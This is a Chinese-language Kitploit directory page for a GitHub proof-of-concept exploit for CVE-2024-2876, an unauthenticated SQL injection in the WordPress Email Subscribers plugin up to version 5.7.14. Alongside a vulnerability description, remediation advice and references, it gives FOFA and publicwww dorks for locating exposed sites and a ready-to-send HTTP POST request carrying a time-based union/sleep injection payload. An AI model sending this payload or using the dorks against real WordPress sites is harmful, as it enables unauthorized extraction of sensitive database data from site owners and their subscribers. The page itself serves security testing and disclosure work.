Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2024-2876 — 针对CVE-2024-2876的概念验证利用代码,该漏洞是WordPress的Email Subscribers插件中的一个未经验证的SQL注入漏洞,能够实现敏感数据提取。 | Kitploit
工具/GitHubGitHub/chsxthwik/cve-2024-2876
漏洞分析漏洞利用Web应用程序漏洞利用信息收集渗透测试
GitHubchsxthwik/cve-2024-2876

CVE-2024-2876

针对CVE-2024-2876的概念验证利用代码,该漏洞是WordPress的Email Subscribers插件中的一个未经验证的SQL注入漏洞,能够实现敏感数据提取。

查看仓库
22341年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2024-2876

#漏洞描述: Email Subscribers by Icegram Express – Email Marketing, Newsletters, Automation for WordPress & WooCommerce 插件(适用于 WordPress)在版本 5.7.14 及之前的所有版本中,由于对用户提供的参数转义不足,且未对现有 SQL 查询进行充分预处理,导致通过 IG_ES_Subscribers_Query 类的 run 函数存在 SQL 注入漏洞。这使得未经认证的攻击者能够将额外的 SQL 查询附加到已有查询中,从而提取数据库中的敏感信息。

#Dork(搜索语句): 1- FOFA:body="/wp-content/plugins/email-subscribers/" 2- publicwww:"/wp-content/plugins/email-subscribers/"

#POC(漏洞验证):

root@kitploit:~
POST /wp-admin/admin-post.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded

page=es_subscribers&is_ajax=1&action=_sent&advanced_filter[conditions][0][0][field]=status=99924)))union(select(sleep(4)))--+&advanced_filter[conditions][0][0][operator]==&advanced_filter[conditions][0][0][value]=1111

#YouTube POC 演示: https://www.youtube.com/watch?v=eDEGt_yXyvE

#如何修复? 由于所有版本直至 5.7.14 均受此 CVE 影响,建议用户将 Email Subscribers by Icegram Express 插件升级至 5.7.15 版本(或最新发布版 5.7.19)。 Patchstack 用户可以选择启用针对易受攻击插件的自动更新。 部署 WAF/WAAP 解决方案作为额外保护层。此类解决方案的优势在于,即使漏洞是未知的新漏洞(0-day),仍可通过检测利用模式和技术来阻止攻击。

#参考资源: https://www.wordfence.com/blog/2024/04/1250-bounty-awarded-for-unauthenticated-sql-injection-vulnerability-patched-in-email-subscribers-by-icegram-express-wordpress-plugin/

下载工具